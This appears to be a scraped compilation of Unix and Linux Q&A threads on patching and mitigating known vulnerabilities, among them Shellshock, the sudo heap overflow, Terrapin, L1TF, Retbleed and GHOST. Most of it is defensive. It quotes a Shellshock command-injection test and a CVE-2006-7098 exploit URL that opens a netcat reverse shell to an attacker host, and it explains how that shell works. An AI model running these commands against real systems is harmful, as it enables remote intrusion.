Conceptually, you could take SSH and replace the tunnel part with the
one from SSL. You could also take HTTPS and replace the SSL thing with
SSH-with-data-transport and a hook to extract the server public key
from its certificate. There is no scientific impossibility and, if
done properly, security would remain the same. However, there is no
widespread set of conventions or existing tools for that.As further evidence I'd direct you to RFC 4253, which discusses the "The Secure Shell (SSH) Transport Layer Protocol". This is SSH's own custom transport layer, it does not use the same one that HTTPS/SSL uses.This document describes the SSH transport layer protocol, which
typically runs on top of TCP/IP. The protocol can be used as a basis
for a number of secure network services. It provides strong
encryption, server authentication, and integrity protection. It may
also provide compression.Lastly this Q&A from the security SE site titled: SSL3 “Poodle” Vulnerability had this to say about the POODLE attack.
excerptThe Poodle attack works in a chosen-plaintext context, like BEAST and
CRIME before it. The attacker is interested in data that gets
protected with SSL, and he can:inject data of his own before and after the secret value that he wants to
obtain;
inspect, intercept and modify the resulting bytes on the wire.The main and about only plausible scenario where such conditions are
met is a Web context: the attacker runs a fake WiFi access point, and
injects some Javascript of his own as part of a Web page (HTTP, not
HTTPS) that the victim browses. The evil Javascript makes the browser
send requests to a HTTPS site (say, a bank Web site) for which the
victim's browser has a cookie. The attacker wants that cookie.So there is no action that needs to be taken for OpenSSH against this particular threat.
ReferencesHow POODLE Happened
Taxonomy of Ciphers/MACs/Kex available in SSH?
Secure Configuration of Ciphers/MACs/Kex available in SSHMore readingSSL3 “Poodle” Vulnerability
|
In wake of the newly-discovered POODLE vulnerability, I'd like to disable SSLv3 on all of my SSH servers. How do I achieve this with OpenSSH?
|
How do I disable SSLv3 in an OpenSSH SSH server to avoid POODLE?
|
No, you could not say it's safe.
https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/Complete mitigation of this vulnerability for Power Systems clients involves installing patches to both system firmware and operating systems. The firmware patch provides partial remediation to these vulnerabilities and is a pre-requisite for the OS patch to be effective.
[...]
Firmware patches for POWER7+, POWER8, and POWER9 platforms are now available via FixCentral. POWER7 patches will be available beginning February 7.
[...]
AIX patches will be available beginning January 26 and will continue to be rolled out through February 12.Update : patches available, http://aix.software.ibm.com/aix/efixes/security/spectre_meltdown_advisory.asc
|
Since Intel, AMD and ARM is affected by the Spectre and Meltdown cpu kernel memory leak bugs/flaws, could we say that Power architecture is safe from these?
|
Is AIX/Power safe from Spectre / Meltdown?
|
gpg --passphrase $my_passphrase My question: is this safe? Will the variable $my_passphrase and/or the decrypted output be visible/accessible in some way?No, that's not really considered safe. The passphrase will be visible in the output of ps, just like all other running processes' command lines. The data itself will not be visible, the pipe is not accessible to other users.
The man page for gpg has this to say about --passphrase:--passphrase string Use string as the passphrase. This can only be used if only one passphrase is supplied. Obviously, this is of very questionable security on a multi-user system. Don't use this option if you can avoid it.Of course, if you have no other users on the system and trust none of your services have been compromised there should be no-one looking at the process list.
But in any case, you could instead use --passphrase-fd and have the shell redirect the passphrase to the program. Using here-strings:
#!/bin/bash
read -e -s -p "Enter passphrase: " my_passphrase
echo # 'read -s' doesn't print a newline, so do it here
gpg --passphrase-fd 3 3<<< "$my_passphrase" --decrypt "$my_file" |
stream_editing_command |
gpg --yes --output "$my_file" --passphrase-fd 3 3<<< "$my_passphrase" --symmetricNote that that only works if the second gpg doesn't truncate the output file before getting the full input. Otherwise the first gpg might not get to read the file before it's truncated.To avoid using the command line, you could also store the passphrase in a file, and then use --passphrase-file. But you'd then need to be careful about setting up the access permissions of the file, to remove it afterwards, and to choose a proper location for it so that the passphrase doesn't get actually stored on persistent storage.
|
Notice: the very same vulnerability has been discussed in this question, but the different setting of the problem (in my case I don't need to store the passphrase) allows for a different solution (i.e. using file descriptors instead of saving the passphrase in a file, see ilkkachu's answer).
Suppose I have a symmetrically encrypted file my_file (with gpg 1.x), in which I store some confidential data, and I want to edit it using the following script:
read -e -s -p "Enter passphrase: " my_passphrase
gpg --passphrase $my_passphrase --decrypt $my_file | stream_editing_command | gpg --yes --output $my_file --passphrase $my_passphrase --symmetric
unset my_passphraseWhere stream_editing_command substitutes/appends something to the stream.
My question: is this safe? Will the variable $my_passphrase and/or the decrypted output be visible/accessible in some way? If it isn't safe, how should I modify the script?
|
Security of bash script involving gpg symmetric encryption
|
This sounds like a big scarry attack, but it's an easy fix. To mitigate the attack, see my Thwarting the Terrapin Attack article for SSH configuration details. Specifically you need to block the ETM HMACs and ChaCha20 cipher as follows:
For recent RHEL-based Linux systems (Alma, Rocky Oracle, etc), this will work:
# cat /etc/crypto-policies/policies/modules/TERRAPIN.pmod
cipher@ssh = -CHACHA20*
ssh_etm = 0# update-crypto-policies --set DEFAULT:TERRAPIN
Setting system policy to DEFAULT:TERRAPIN
Note: System-wide crypto policies are applied on application start-up.
It is recommended to restart the system for the change of policies
to fully take place.Alternatively, you can force AES-GCM which is not vulnerable if your system doesn't have (or doesn't use) update-crypto-policies (eg, as noted by @StephenKitt, Debian/Ubuntu may not use crypto-policies by default):
# cat /etc/ssh/sshd_config
[...]
Ciphers [emailprotected]Then test with the testing tool provided by the original researchers.
|
The Terrapin Attack on SSH details a "prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary amount of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it."
How would you change the SSH configuration to mitigate this attack?
|
How do you mitigate the Terrapin SSH attack?
|
To get updates on older releases you will probably need to add the Debian6.0 (Squeeze) LTS repository to your sources.list.
To add this repository, edit /etc/apt/sources.list and add the following line to the end of the file.
deb http://ftp.us.debian.org/debian squeeze-lts main non-free contribThen run:
apt-get updateYou should see some new sources in the list of repositories now as the update is running. Now just:
apt-get install --only-upgrade bashHere is a listing of my sources.list file from a Squeeze server I just upgraded:
deb http://ftp.us.debian.org/debian/ squeeze main
deb-src http://ftp.us.debian.org/debian/ squeeze maindeb http://security.debian.org/ squeeze/updates main
deb-src http://security.debian.org/ squeeze/updates main# squeeze-updates, previously known as 'volatile'
deb http://ftp.us.debian.org/debian/ squeeze-updates main
deb-src http://ftp.us.debian.org/debian/ squeeze-updates main# Other - Adding the lsb source for security updates
deb http://http.debian.net/debian/ squeeze-lts main contrib non-free
deb-src http://http.debian.net/debian/ squeeze-lts main contrib non-free
|
I upgraded my old Debian6.0 (Squeeze) server, but still the vulnerability seems to be there:
$ env x='() { :;}; echo vulnerable' bash -c 'echo hello'
vulnerable
helloHow do I upgrade Bash to a newer version on Debian6.0 (Squeeze)?
|
Bash vulnerability CVE-2014-6271 (Shellshock) fix on Debian 6.0 (Squeeze) [duplicate]
|
The list of versions you’re looking at only documents versions of sudo released by the sudo project itself. Distributions such as Ubuntu typically add patches to address such security vulnerabilities, instead of upgrading to the latest version of sudo.
To determine whether your version is affected, you need to look at the security information provided by your distribution; in this instance, the relevant notice is USN-4705-1, which indicates that your version is fixed.
You can also look at the package changelog, in /usr/share/doc/sudo/changelog.Debian.gz; this should list the CVEs addressed by the version currently installed on your system (if any):
* SECURITY UPDATE: dir existence issue via sudoedit race
- debian/patches/CVE-2021-23239.patch: fix potential directory existing
info leak in sudoedit in src/sudo_edit.c.
- CVE-2021-23239
* SECURITY UPDATE: heap-based buffer overflow
- debian/patches/CVE-2021-3156-pre1.patch: check lock record size in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-pre2.patch: sanity check size when
converting the first record to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-1.patch: reset valid_flags to
MODE_NONINTERACTIVE for sudoedit in src/parse_args.c.
- debian/patches/CVE-2021-3156-2.patch: add sudoedit flag checks in
plugin in plugins/sudoers/policy.c.
- debian/patches/CVE-2021-3156-3.patch: fix potential buffer overflow
when unescaping backslashes in plugins/sudoers/sudoers.c.
- debian/patches/CVE-2021-3156-4.patch: fix the memset offset when
converting a v1 timestamp to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-5.patch: don't assume that argv is
allocated as a single flat buffer in src/parse_args.c.
- CVE-2021-3156
|
I have some servers running Ubuntu 18.04.5 LTS
In last update of sudo package I can see that sudo:amd64 1.8.21p2-3ubuntu1.4 has been installed on 26/01/2021 (the same day that Heap-based buffer overflow in Sudo vulnerability, CVE-2021-3156 was published)
As per this list , sudo version 1.8.21p2 is impacted by this vulnerability.
However, if I run the test command to check if the systems are vulnerable, I get:
# sudoedit -s /
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...Which is the output when the system is not impacted by this vulnerability.
Are my systems vulnerables or not ? Is there any incongruence between the versions list and the command output ?
|
Heap-based buffer overflow in Sudo vulnerability - sudo version impacted?
|
I did a little bit of digging, and this vulnerability in the documentation is referred to as:
L1TF = L1 Terminal Fault
Actually I found the kernel documentation directly, a quote:
l1tf= [X86] Control mitigation of the L1TF vulnerability on
affected CPUs The kernel PTE inversion protection is unconditionally
enabled and cannot be disabled. full
Provides all available mitigations for the
L1TF vulnerability. Disables SMT and
enables all mitigations in the
hypervisors, i.e. unconditional L1D flush. SMT control and L1D flush control via the
sysfs interface is still possible after
boot. Hypervisors will issue a warning
when the first VM is started in a
potentially insecure configuration,
i.e. SMT enabled or L1D flush disabled. full,force
Same as 'full', but disables SMT and L1D
flush runtime control. Implies the
'nosmt=force' command line option.
(i.e. sysfs control of SMT is disabled.) flush
Leaves SMT enabled and enables the default
hypervisor mitigation, i.e. conditional
L1D flush. SMT control and L1D flush control via the
sysfs interface is still possible after
boot. Hypervisors will issue a warning
when the first VM is started in a
potentially insecure configuration,
i.e. SMT enabled or L1D flush disabled. flush,nosmt Disables SMT and enables the default
hypervisor mitigation. SMT control and L1D flush control via the
sysfs interface is still possible after
boot. Hypervisors will issue a warning
when the first VM is started in a
potentially insecure configuration,
i.e. SMT enabled or L1D flush disabled. flush,nowarn
Same as 'flush', but hypervisors will not
warn when a VM is started in a potentially
insecure configuration. off
Disables hypervisor mitigations and doesn't
emit any warnings.
It also drops the swap size and available
RAM limit restriction on both hypervisor and
bare metal. Default is 'flush'. For details see: Documentation/admin-guide/hw-vuln/l1tf.rstI tried some of these options, ending up with the full,force. But that is my personal choice only.How to use
If you're asking now how to use (what to edit), then the answer is to:Edit the following file with your favorite text editor:
/etc/default/grubAdd one of the options, for example let me use l1tf=full,force, to this line:
GRUB_CMDLINE_LINUX_DEFAULT="... l1tf=full,force"Update your bootloader config with:
sudo update-grubChanges are effective after reboot:
reboot --rebootResult
In case you decide to proceed with testing this solution, you should end up with similar results:
CVE-2018-3646 aka 'Foreshadow-NG (VMM), L1 terminal fault'
* Information from the /sys interface: Mitigation: PTE Inversion; VMX: cache flushes, SMT disabled
* This system is a host running a hypervisor: YES (paranoid mode)
* Mitigation 1 (KVM)
* EPT is disabled: NO
* Mitigation 2
* L1D flush is supported by kernel: YES (found flush_l1d in /proc/cpuinfo)
* L1D flush enabled: YES (unconditional flushes)
* Hardware-backed L1D flush supported: YES (performance impact of the mitigation will be greatly reduced)
* Hyper-Threading (SMT) is enabled: NO
> STATUS: NOT VULNERABLE (L1D unconditional flushing and Hyper-Threading disabled are mitigating the vulnerability)An image in UHD, can be enlarged:Stephen Kitt's notes
It's also worth reading the L1TF-specific kernel documentation, which explains the vulnerabilities and mitigations in detail, and explains how to enable and disable mitigations (including disabling SMT) at runtime, without rebooting or altering the system's configuration.
|
I used the spectre-meltdown-checker, version 0.42, without any option resulting in all-green results. But, in a help page, I found the --paranoid switch, which resulted in about a half of later CVEs to become red. I read what it told me, that for full mitigation I would have to disable hyper-threading, it scared me off a little bit, so I better did so, resulting in only one remaining red flag being CVE-2018-3646 = L1D unconditional flushing should be enabled to fully mitigate the vulnerability.Laptop: Dell Inspiron 15 with latest BIOS (1.8.0, link for details).
Processor: Intel© Core™ i7-7700HQ (link to Intel Ark).
Linux Kernel: 4.15.0-65-generic; full uname -a:
Linux dell-7577 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/LinuxFor completeness, I add info from the help on the --paranoid switch:
--paranoid require IBPB to deem Variant 2 as mitigated
also require SMT disabled + unconditional L1D flush to deem Foreshadow-NG VMM as mitigated
also require SMT disabled to deem MDS vulnerabilities mitigatedCVE-2018-3646 aka 'Foreshadow-NG (VMM), L1 terminal fault'
* Information from the /sys interface: Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable
* This system is a host running a hypervisor: YES (paranoid mode)
* Mitigation 1 (KVM)
* EPT is disabled: NO
* Mitigation 2
* L1D flush is supported by kernel: YES (found flush_l1d in /proc/cpuinfo)
* L1D flush enabled: YES (conditional flushes)
* Hardware-backed L1D flush supported: YES (performance impact of the mitigation will be greatly reduced)
* Hyper-Threading (SMT) is enabled: YES
> STATUS: VULNERABLE (enable L1D unconditional flushing and disable Hyper-Threading to fully mitigate the vulnerability)Actual question
Apart from disabling Hyper-Threading, how do I enable this unconditional L1D flush?
|
L1D unconditional flushing should be enabled to fully mitigate the vulnerability (CVE-2018-3646)
|
KDE bug - No mitigation. Update to kauth >= 5.34 and kdelibs >= 4.14.32 (when released) is the solution provided by KDE folks. Just wait for the updated port to have this problem fixed.
OpenEXR bugs - No mitigation, and the devs are not showing any sign that they will fix this soon. Best guess here is to remove this package, if you don't really use it (neither is a dependency).
|
By checking the state of installed package using the pkg audit -F tool on freeBSD 11 , I have found 4 vulnerability on the installed packages (installed through pkg) : samba ,OpenEXR , kdelibs and ImageMagick .
I have upgraded ImageMagick and samba to the latest version ( + following the mitigation guide for samba : adding nt pipe support = no to nsmb.conf) .
#pkg search samba
p5-Samba-LDAP-0.05_2 Manage a Samba PDC with an LDAP Backend
p5-Samba-SIDhelper-0.0.0_3 Create SIDs based on G/UIDs
samba-nsupdate-9.8.6_1 nsupdate utility with GSS-TSIG support
samba42-4.2.14_1 Free SMB/CIFS and AD/DC server and client for Unix
samba43-4.3.13_2 Free SMB/CIFS and AD/DC server and client for Unix
samba44-4.4.13 Free SMB/CIFS and AD/DC server and client for Unix
samba45-4.5.8 Free SMB/CIFS and AD/DC server and client for Unix
samba46-4.6.2 Free SMB/CIFS and AD/DC server and client for UnixThere is no upgrade available for OpenEXR and kdelibs , the latest version is already installed.
I am using the KDE4 on FreeBSD 11 , the kdelibs vulnerability affect Linux and Unix systems with the KDE4/KDE5 desktop environment.
How to mitigate the multiple vulnerability : remote code execution and local privilege escalation on FreeBSD 11?
# pkg audit -F
vulnxml file up-to-date
ImageMagick7-7.0.3.7_1 is vulnerable:
ImageMagick -- multiple vulnerabilities
CVE: CVE-2017-9144
CVE: CVE-2017-9143
CVE: CVE-2017-9142
CVE: CVE-2017-9141
CVE: CVE-2017-8830
CVE: CVE-2017-8765
CVE: CVE-2017-8357
CVE: CVE-2017-8356
CVE: CVE-2017-8355
CVE: CVE-2017-8354
CVE: CVE-2017-8353
CVE: CVE-2017-8352
CVE: CVE-2017-8351
CVE: CVE-2017-8350
CVE: CVE-2017-8349
CVE: CVE-2017-8348
CVE: CVE-2017-8347
CVE: CVE-2017-8346
CVE: CVE-2017-8345
CVE: CVE-2017-8344
CVE: CVE-2017-8343
CVE: CVE-2017-7943
CVE: CVE-2017-7942
CVE: CVE-2017-7941
CVE: CVE-2017-7619
CVE: CVE-2017-7606
CVE: CVE-2017-7275
CVE: CVE-2017-6502
CVE: CVE-2017-6501
CVE: CVE-2017-6500
CVE: CVE-2017-6499
CVE: CVE-2017-6498
CVE: CVE-2017-6497
CVE: CVE-2017-5511
CVE: CVE-2017-5510
CVE: CVE-2017-5509
CVE: CVE-2017-5508
CVE: CVE-2017-5507
CVE: CVE-2017-5506
WWW: https://vuxml.FreeBSD.org/freebsd/50776801-4183-11e7-b291-b499baebfeaf.htmlkdelibs-4.14.30_1 is vulnerable:
kauth: Local privilege escalation
CVE: CVE-2017-8422
WWW: https://vuxml.FreeBSD.org/freebsd/0baee383-356c-11e7-b9a9-50e549ebab6c.htmlOpenEXR-2.2.0_7 is vulnerable:
OpenEXR -- multiple remote code execution and denial of service vulnerabilities
CVE: CVE-2017-9116
CVE: CVE-2017-9115
CVE: CVE-2017-9114
CVE: CVE-2017-9113
CVE: CVE-2017-9112
CVE: CVE-2017-9111
CVE: CVE-2017-9110
WWW: https://vuxml.FreeBSD.org/freebsd/803879e9-4195-11e7-9b08-080027ef73ec.htmlsamba46-4.6.2 is vulnerable:
samba -- remote code execution vulnerability
CVE: CVE-2017-7494
WWW: https://vuxml.FreeBSD.org/freebsd/6f4d96c0-4062-11e7-b291-b499baebfeaf.html4 problem(s) in the installed packages found.
|
How to mitigate the multiple vulnerability : remote code execution and local privilege escalation on FreeBSD 11?
|
Running a 32-bit kernel.
If you're able to turn on CONFIG_IA32_EMULATION, then you're not running a 32-bit kernel.
You're running a 64-bit kernel. This is the correct type of kernel for you to run. No configuration change is required.
https://lore.kernel.org/lkml/Ys%[emailprotected]/We are booting the i386 kernel on an x86 machine.
With Spectre V2 patches merged into Linux mainline we have been noticing
RETBleed: WARNING: Spectre v2 mitigation leaves CPU vulnerable to
RETBleed attacks, data leaks possible!That's funny. I don't think that's a valid combination that should be
cared about, but I'll leave it to Pawan to comment if it is something
that is "real" to be concerned for.Yeah, so far nobody cared to fix 32bit. If someone realllllly cares
and wants to put the effort in I suppose I'll review the patches, but
seriously, you shouldn't be running 32bit kernels on Skylake / Zen
based systems, that's just silly.
|
I'm updating my kernel to protect my system against the "Retbleed" exploit, and I know that affected 32-bit things haven't received the necessary mitigations. I'm wondering which 32-bit features I need to disable in the Linux kernel to be fully protected.
I've found CONFIG_X86_X32_ABI and CONFIG_IA32_EMULATION so far. I'd like to maintain the ability to execute 32-bit binaries with reduced performance, if possible. Which (or both) of these config options enable the exploit? Are there any other features I need to disable?
I'm aware that some older CPUs must disable SMT to be fully protected, but my CPU is not one of them.
|
Which 32-bit features are still vulnerable to "Retbleed" in the Linux kernel?
|
Both tools agree; by default, spectre-meltdown-checker flags vulnerabilities as fixed even when SMT is an issue. If you add the --paranoid flag you should see a number of green boxes change to red.
On your setup, all the available fixes are applied on your system, apart from disabling SMT which is your decision to make. See also Do I need to take action regarding my Microarchitectural Data Sampling (MDS) status?
Which tool you trust most depends on how recent the tests are; pulling the latest spectre-meltdown-checker will usually ensure up-to-date tests there.
|
I'm running Debian Buster (10.3) on a ThinkPad T420 (i5-2520M), current intel-microcode package is installed. To check for known CPU vulnerabilities I used the spectre-meltdown-checker script (https://github.com/speed47/spectre-meltdown-checker) which resulted in this output:According to the script all CVEs related to the Microarchitectural Data Sampling (MDS) vulnerability (which are specified in The Linux kernel user’s and administrator’s guide at: https://www.kernel.org/doc/html/latest/admin-guide/hw-vuln/mds.html) are fixed on my system.
What makes me think is that cat /sys/devices/system/cpu/vulnerabilities/mds leads to Mitigation: Clear CPU buffers; SMT vulnerable which means that "The processor is vulnerable and the CPU buffer clearing mitigation is enabled." and "SMT is enabled".
How should the outputs of the tools be interpreted, or better asked, which tool can I trust?
EDIT:
This is the output with --paranoid option enabled:
|
How to check for MDS vulnerability?
|
Linux applications almost always use dynamic linking to the C library, meaning it is not compiled into them -- it is linked at runtime. This means if you have upgraded the C library, you should not have to do anything else.
However, while it would be very unusual, it is not impossible for things to be built with a statically linked glibc. The best thing to do is just look at the documentation for the application in question. If this is the practice, it is almost certainly explicit.
You can check executables with file. It should say "dynamically linked" in the output. I think it is still possible for such a binary to then incorporate a static glibc -- but this would be incredibly obtuse. The way to double check would be:
ldd whatever | grep libc.soWhere whatever is the binary you want to check. You should get some output. If not, leave a comment here so I can eat my hat because I don't believe anyone would create such a thing.
If you do find an actual static binary, this does not mean it necessarily used glibc. You'd have to confirm that by consulting the source tree, documentation, or developers.I've read that some people had to revert the update bcos they faced segfaults in their apps.I've seen that second and third hand too. I haven't actually seen a concrete description of such a case though. I think it is very unlikely, to be honest.
|
I've CentOS 6.0 server with glibc-2.12-1.7.el6.x86_64 running many open source services and some of my own C programs.
To fix ghost vulnerability, I need to update it to glibc-2.12-1.149.el6_6.5.
Since the version difference seems large.
I was wondering whether I need to recompile my C/C++ apps or even some of the open source services ?
How do I even test them bcos testing everything is next to impossible ?
I've read that some people had to revert the update bcos they faced segfaults in their apps.
|
Ghost vulnerability - recompile C/C++ programs?
|
At the time of writing (17 August 2023) the page of CVE-2023-38408 on the Debian security tracker says that:Debian 10 (buster, security channel) is fixed
Debian 10 (buster) is vulnerable
Debian 11 (bullseye) is vulnerable
Debian 12 (bookworm) is vulnerable
Debian 13 (trixie) is fixed
Debian Unstable (sid) is fixedThere is also a note saying that:[...]
Minor issue; needs specific conditions and forwarding was always subject to caution warning
[...]
Exploitation requires the presence of specific libraries on the victim system.
Remote exploitation requires that the agent was forwarded to an attacker-controlled
system.
|
I really really hope I'm wrong here, but it seems that Debian 11 has a vulnerable version of OpenSSH.
My OpenSSH banner reports my OpenSSH version is:
8.4p1 Debian 5+deb11u1
I checked with sshd and it reports the same version.
According to this CVE-2023-38408 ANY version before 9.3p2 is vulnerable.
I tried sudo apt update && sudo apt full-upgrade but it did not update the OpenSSH version..
|
Are all Debian 11 systems automatically vulnerable to CVE-2023-38408?
|
The thing what you are asking for to me it seems like writing standard monitoring scripts.
The best way to approach it is to settle on some programming language and use it to write them all.
Bash scripting is not the best choice as it's flaky for some operations - it can do a lot, but it's huge problem with maintaining it and it's very messy due to the usage of various external binaries and handling errors and so on, it's not good as exception handling in other languages.
I'd recommend to use one of the JVM languages - Java, Scala, Groovy - you have there drivers for every database and other things. Also C# is good choice as it has all libraries.
If not, then Python, PHP, Perl - here you have also a lot of drivers and APIs.
So you need to take this subject seriously as it's one of the most important things and assure proper test for every service.
As you write just the scripts, you can use any existing network monitoring front-end like Nagios with Thruk to power the scheduled execution of these and notifications / reporting.
Moreover, you can draw metrics with pnp4nagios.
Also note that Vulnerability Scan and Monitoring are two different things. For the first you have OpenVAS and Nessus, for the second you have Nagios, Solar Winds and others. What you want to do is to use custom scripts with e.g. Nagios.
It is also very good way to learn programming. All you need is to do very simple scripts so this way you can learn a lot without much pressure. Dedicate 2-3 hours per day all the time, so this way you can gain big insight into your infrastructure. You can start with Eclipse or IntelliJ and use Gradle to build simple projects. Since there's good automation with Gradle and good support in Java you should be happy in long term. And you can ask dev team for help. Check the Nagios plugin documentation what strings should be returned to draw graphs with pnp4nagios.
You can also try ingesting logs into the database, which is also very helpful.
Now some more practical info. You can run java mini-programs (Nagios plugins) remotely or you can run it locally on Nagios machine (preferred). So this way you ssh (in Java or Python) to the system, read the file, download it and parse it. So you need some of the network operations in some scenarios.
You can also use Cloud APIs.
And you can use SNMP too with existing Nagios plugins so you don't need Java for everything.
Some databases you can monitor with dedicated solutions, if you dont do scripting manually (for which Nagios is the best), you can find on the web something which will monitor your DB performance.
Finally, monitoring scripts are OK to check if you database has password. This is what it is used to do normally. And also that it doesn't run out of RAM, disk space etc.
And here is how this can be done properly.Database of your infrastructure, e.g. all hosts and so on, possibly with automated detection. This is linked to the build infrastructure / automation. This can be more than one database if you use cloud.
Another database with the logs and other e.g. documents, so this contains log of execution of Nagios and results from scripts run in (4). Here you can ingest any other logs. MongoDB would be good. Cassandra can do it as well.
NagiosRun the check which looks into the database (2) and see if checks were successful and what is the result
Check if the background script is running by checking the logs from database (2)Background scripts running password / access checksIf every system from database (1) does not have empty root password or default password set
If every system from database (1) allows certain logons
Ingest the results and logs into the database (2)
This can also run OpenVAS and result can be ingested to (2)As result, you can then update build (1) or servers from (1) if there's default password or no password. You can make also build (1) generate checks for Nagios to monitor and produce specific metrics. You can run many Nagios systems. Database (2) can be used to ingest logs from various sources (you'd need adapters for this). Bases on these logs you can see whatever is brute-forced and tune the policies etc.Also Nessus and OpenVAS are huge hogs. So using Nagios with dedicated checks for hosts is just easy and effective way. Also Nessus and OpenVAS are not good solutions for checking for default or lack of passwords. Dedicated script is the better way of solving this problem.
|
I need to write some kind of bash script that would check conf files of services (commonly used as nginx apache mongodb cassandra ssh etc) and search for patterns (i.e. check if mongod.conf has authorization: enabled line or check if ssh logging via keys is enabled, also checking if every service is in it newest version, disabling default users) to be sure that the service is safe.
But here's one problem I can't solve (yet ;)) - I need to prove that my script works - do you know any application that would check for vulnerabilities of commonly used services? I don't mean websites - services. I could perform that test before running my script and after and then - voila - my script is saving the world ;)
I would be really thankful for any answer.
Thank you so much :3
|
Check service for vulnerabilities [closed]
|
I wrote this script, and my official guide is available here. The simplest solution is to upgrade to the latest Nmap (version 6.47 as of this writing).
|
Wanting to setup Nmap on my Ubuntu 14.04 LTS system to detect HeartBleed vulnerability. I followed the instructions here:
http://cyberarms.wordpress.com/2014/04/20/detecting-openssl-heartbleed-with-nmap-exploiting-with-metasploit/
To create the script files and place them in the proper directory. However the script throws an execution error.
<error>
|_ssl-heartbleed: ERROR: Script execution failed (use -d to debug)
</error>So I ran it with -d to debug and get this:
<error>
NSE: Starting ssl-heartbleed against "testsite".com (IP Address:443).
Initiating NSE at 08:28
NSE: ssl-heartbleed against testsite.com (IP Address:443) threw an error!
/usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:77: variable 'keys' is not declared
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nselib/strict.lua:80: in function '__index'
/usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:77: in function 'testversion'
/usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:232: in function </usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:205>
(...tail calls...) Completed NSE at 08:28, 0.01s elapsedThe host I scanned sits on public IP space so I know it's not a FW issue. I also am the owner of the files and have execute perms for the script.
|
Nmap script execution to detect heartbleed is failing
|
So, after rereading the exploit info several times, I've certain doubts about the phrase local attacker: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).Yes, you're right. Actually webserver is a target server with that vulnerability, myhost is an attacker's machine.
By placing cgipwn binary in webserver's /cgi-bin directory and opening http://webserver/cgi-bin/cgipwn?..., attacker attempts to execute nc myhost 31337 /bin/sh on webserver, as a user who started Apache (usually root).
Attacker previously runs nc -vvv -l -p 31337 on myhost so that it can accept that nc connection from webserver. If everything goes well, attacker gets access to an interactive session of /bin/sh running as Apache starter user on webserver.
|
I'm studying the vulnerabilities of an old version of Apache, the 1.3.34. And I don't quite understand in what exact situation the CVE 2006-7098 vulnerability can be exploited. The README included in the exploit states that:Local attacker can influence Apache to direct commands
into an open tty owned by user who started apache process, usually root.
This results in arbitrary command execution. Notes: Must have CGI execution privileges and service started manually by root via shell.
Usage: nc -vvv -l -p 31337
http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0dAt the beginning I understood that the vulnerability could be exploited from another machine in the same network of the vulnerable server. So from this other machine (attacker) I:compiled the cgipwn exploit and installed it in the cgi-bin of the
attacker machine apache.
executed the nc command from the attacker machine specifying -p as the port where the attacker apache listens to, webserver as the attacker machine IP and myhost as the server with the vulnerability.But I've not succeeded: the command just doesn't return anything.
So, after rereading the exploit info several times, I've certain doubts about the phrase local attacker: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).
Could any body shed some light on this?
|
Does CVE 2006-7098 require access (being a logged in) to the vulnerable Debian?
|
CVE-2021-3156 is fixed by sudo 1.8.27-1+deb10u3.
Both CVE-2021-23239 and CVE-2021-23240 are mitigated by fs.protected_symlinks, which is set to 1 by default in Debian 10: this setting only allows symlinks to be followed if they are outside a sticky world-writable directory (such as /tmp), or when the uid of the symlink and follower match, or when the directory owner matches the symlink’s owner. CVE-2021-23240 additionally only affects systems using SELinux, which isn’t the default in Debian.
|
On Linux Mint 20.1 Ulyssa, I have received a security update to patch tow security flaws leading to a local privilege escalation without password for all unpatched sudo version before 1.9.5 version and here is a part of the change log:
sudo (1.8.31-1ubuntu1.2) focal-security; urgency=medium * SECURITY UPDATE: dir existence issue via sudoedit race
- debian/patches/CVE-2021-23239.patch: fix potential directory existing
info leak in sudoedit in src/sudo_edit.c.
- CVE-2021-23239
* SECURITY UPDATE: heap-based buffer overflow
- debian/patches/CVE-2021-3156-pre1.patch: sanity check size when
converting the first record to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-1.patch: reset valid_flags to
MODE_NONINTERACTIVE for sudoedit in src/parse_args.c.
- debian/patches/CVE-2021-3156-2.patch: add sudoedit flag checks in
plugin in plugins/sudoers/policy.c.
- debian/patches/CVE-2021-3156-3.patch: fix potential buffer overflow
when unescaping backslashes in plugins/sudoers/sudoers.c.
- debian/patches/CVE-2021-3156-4.patch: fix the memset offset when
converting a v1 timestamp to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-5.patch: don't assume that argv is
allocated as a single flat buffer in src/parse_args.c.
- CVE-2021-3156 -- Marc Deslauriers <[emailprotected]> Tue, 19 Jan 2021 09:21:02 -0500But on debian Buster I have received only one update for sudo package.
On debian sudo --version : 1.8.27-1+deb10u3
but on linux mint: sudo --version : 1.8.31-1ubuntu1.2
Sudo versions affected:Sudo versions 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1 are affected.qualys security paper:Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and distributions are also likely to be exploitable.Until a security update will be uploaded, is there any way to harden debian to avoid exploiting the 2 security flaws CVE-2021-23239 and CVE-2021-3156?
